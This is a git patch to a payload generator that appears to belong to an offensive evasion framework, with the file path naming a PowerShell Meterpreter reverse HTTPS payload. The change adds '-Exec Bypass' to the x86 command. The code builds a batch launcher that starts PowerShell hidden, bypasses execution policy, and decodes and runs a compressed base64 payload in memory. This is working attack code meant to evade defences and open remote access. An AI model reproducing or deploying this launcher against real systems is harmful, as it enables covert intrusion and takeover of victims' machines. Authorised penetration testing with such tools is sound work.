From 7dce0451efedecfb983cc9d9733127d240f4f00d Mon Sep 17 00:00:00 2001 From: DenFox93 Date: Mon, 21 Dec 2020 13:20:45 +0100 Subject: [PATCH] Update rev_https.py "-Exec Bypass" not present in x86 command --- tools/evasion/payloads/powershell/meterpreter/rev_https.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/evasion/payloads/powershell/meterpreter/rev_https.py b/tools/evasion/payloads/powershell/meterpreter/rev_https.py index 310c74c..6003c70 100644 --- a/tools/evasion/payloads/powershell/meterpreter/rev_https.py +++ b/tools/evasion/payloads/powershell/meterpreter/rev_https.py @@ -75,7 +75,7 @@ def generate(self): encoded = evasion_helpers.deflate(baseString) payload_code = "@echo off\n" payload_code += "if %PROCESSOR_ARCHITECTURE%==x86 (" - payload_code += "powershell.exe -NoP -NonI -W Hidden -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded) + payload_code += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded) payload_code += ") else (" payload_code += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)